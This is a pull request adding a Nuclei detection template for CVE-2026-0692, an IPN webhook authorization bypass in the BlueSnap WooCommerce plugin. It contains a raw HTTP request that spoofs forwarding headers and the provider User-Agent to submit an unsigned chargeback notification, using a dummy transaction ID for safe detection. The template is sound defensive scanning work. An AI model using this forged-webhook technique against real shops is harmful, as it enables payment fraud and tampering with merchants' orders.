### PR TITLE
Add CVE-2026-0692 template

### DIFF
--- a/http/cves/2026/CVE-2026-0692.yaml
+++ b/http/cves/2026/CVE-2026-0692.yaml
@@ -1,0 +1,49 @@
+id: CVE-2026-0692
+
+info:
+  name: BlueSnap Payment Gateway for WooCommerce <=3.4.0 - IPN Authorization Bypass
+  author: str4k3r
+  severity: high
+  description: |
+    BlueSnap Payment Gateway for WooCommerce <= 3.4.0 validates its
+    unauthenticated IPN webhook using WooCommerce's client-IP geolocation,
+    which trusts spoofed forwarding headers instead of requiring a webhook
+    signature. Version 3.4.1 replaces the IP check with HMAC-SHA256 security
+    headers. This detector supplies a generated, non-existent transaction ID,
+    so the vulnerable code reaches the order lookup and returns `Order could
+    not be found` without changing an order.
+  reference:
+    - https://plugins.svn.wordpress.org/bluesnap-payment-gateway-for-woocommerce/tags/3.4.0/includes/class-wc-bluesnap-ipn-webhooks.php
+    - https://plugins.svn.wordpress.org/bluesnap-payment-gateway-for-woocommerce/tags/3.4.1/includes/class-wc-bluesnap-ipn-webhooks.php
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-0692
+  classification:
+    cve-id: CVE-2026-0692
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
+    cvss-score: 7.5
+  metadata:
+    max-request: 1
+    product: bluesnap-payment-gateway-for-woocommerce
+    vendor: bluesnap
+    verified: true
+  tags: cve,cve2026,wordpress,woocommerce,bluesnap,auth-bypass,unauth,webhook
+
+http:
+  - raw:
+      - |
+        POST /?wc-api=bluesnap HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: BlueSnap
+        X-Forwarded-For: 38.99.111.60
+        Content-Type: application/x-www-form-urlencoded
+
+        transactionType=CHARGEBACK&merchantTransactionId=nuclei-{{randstr}}&referenceNumber=CVE0692CODEX&reason=CVE0692
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 400
+      - type: word
+        part: body
+        words:
+          - "Order could not be found"


### PR DESCRIPTION
## Summary

Adds a Nuclei template for CVE-2026-0692 in BlueSnap Payment Gateway for
WooCommerce.

## Detection

The template sends one unsigned IPN request with the provider User-Agent and
spoofed forwarding headers. It uses a generated, non-existent transaction ID,
so the vulnerable handler reaches the order lookup and returns `Order could
not be found` without changing an order. Version 3.4.1 rejects the request at
the HMAC security-header check before order lookup.

## References

- https://plugins.svn.wordpress.org/bluesnap-payment-gateway-for-woocommerce/tags/3.4.0/includes/class-wc-bluesnap-ipn-webhooks.php
- https://plugins.svn.wordpress.org/bluesnap-payment-gateway-for-woocommerce/tags/3.4.1/includes/class-wc-bluesnap-ipn-webhooks.php
- https://nvd.nist.gov/vuln/detail/CVE-2026-0692

## Validation

- Vulnerable: BlueSnap Payment Gateway 3.4.0 with WooCommerce 11.0.1
- Fixed: BlueSnap Payment Gateway 3.4.1 with WooCommerce 11.0.1
- Native Nuclei v3.11.0: vulnerable `DETECTED` 3/3; fixed `NOT_DETECTED` 3/3